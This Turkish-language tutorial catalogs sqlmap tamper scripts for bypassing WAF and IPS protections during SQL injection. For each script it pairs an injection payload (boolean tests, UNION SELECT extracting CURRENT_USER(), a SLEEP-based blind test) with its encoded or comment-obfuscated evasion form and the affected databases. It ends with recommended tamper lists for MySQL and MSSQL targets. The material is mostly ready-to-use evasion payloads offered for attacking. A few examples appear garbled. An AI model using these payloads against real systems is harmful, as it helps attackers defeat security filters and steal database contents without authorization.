Sqlmap Tamper Scriptleri

Sqlmap ile sql injection yaparken komutların işe yaramaması sonucunda WAF yani güvenlik duvarını geçilmediğini anlamak lazım bu durumda Sqlmap’in WAF,IPS gibi saldırı önleme sistemlerini bypass etmesi için tamper scriptleri kullanılır.

sqlmap –list-tampers komutu ile tamper listenizi görebilirsiniz


apostrophemask.py (UTF-8)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

apostrophenullencode.py (unicode)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu: AND %271%27=%271%27

appendnullbyte.py ()
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu: AND 1=1
Platform:
* Microsoft Access

base64encode.py (base64)
Örnek:
* Orjinal Komut: 1' AND SLEEP(5)#
* Bypass Komutu: MScgQU5EIFNMRUVQKDUpIw==

between.py (“not between” “>”)
Örnek:
* Orjinal Komut: 'A > B'
* Bypass Komutu: 'A NOT BETWEEN 0 AND B'

bluecoat.py (“like” “=”)
Örnek:
* Orjinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu: SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS

chardoubleencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

charencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

charunicodeencode.py
Örnek:
* Orjinal Komut: SELECT FIELD%20FROM TABLE
* Bypass Komutu: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* ASP.NET

equaltolike.py (“like” “=”)
Örnek:
* Orjinal Komut: SELECT * FROM users WHERE id=1
* Bypass Komutu: SELECT * FROM users WHERE id LIKE 1

halfversionedmorekeywords.py
Örnek:
* Orjinal Komut: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Komutu: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1

ifnull2ifisnull.py (“IF(ISNULL(A), B, A)” “IFNULL(A, B)”)
Örnek:
* Orjinal Komut: IFNULL(1, 2)
* Bypass Komutu: IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)

modsecurityversioned.py
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu: 1 /*!30000AND 2>1*/--
Platform:
* MySQL

modsecurityzeroversioned.py (“0000”)
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu: 1 /*!00000AND 2>1*/--
Platform:
* MySQL

multiplespaces.py
Örnek:
* Orjinal Komut: UNION SELECT
* Bypass Komutu:  UNION  SELECT

nonrecursivereplacement.py
Örnek:
* Orjinal Komut: 1 UNION SELECT 2--
* Bypass Komutu: 1 UNUNIONION SELSELECTECT 2--

percentage.py (“%”)
Örnek:
* Orjinal Komut: SELECT FIELD FROM TABLE
* Bypass Komutu: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP

randomcase.py
Örnek:
* Orjinal Komut: INSERT
* Bypass Komutu: InsERt

randomcomments.py
Örnek:
'INSERT' becomes 'IN/**/S/**/ERT'

securesphere.py
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu: AND 1=1 and '0having'='0having'

sp_password.py (“sp_password”)
Örnek:
* Orjinal Komut: 1 AND 9227=9227--
* Bypass Komutu: 1 AND 9227=9227--sp_password
Platform:
* MSSQL

space2comment.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT/**/id/**/FROM/**/users

space2dash.py (“--”)
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite

space2hash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL

space2morehash.py
Platform:
* MySQL >= 5.1.13

space2mssqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server

space2mssqlhash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1%23%0A9227=9227
Platform:
* MSSQL
* MySQL

space2mysqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL

space2mysqldash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL

space2plus.py (“+”)
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT+id+FROM+users

space2randomblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu: SELECTridtFROMnusers

unionalltounion.py (“union all” “union”)
Örnek:
* Orjinal Komut: -1 UNION ALL SELECT
* Bypass Komutu: -1 UNION SELECT

unmagicquotes.py (“%bf%27” “--”)
Örnek:
* Orjinal Komut: 1' AND 1=1
* Bypass Komutu: 1%bf%27 AND 1=1--%20

versionedkeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL

versionedmorekeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13

Genel olarak kullanabileceğiniz tamper listesi:

apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


MSSQL için kullanabileceğiniz tamper listesi:

between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes


MYSQL için kullanabileceğiniz tamper listesi:

between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor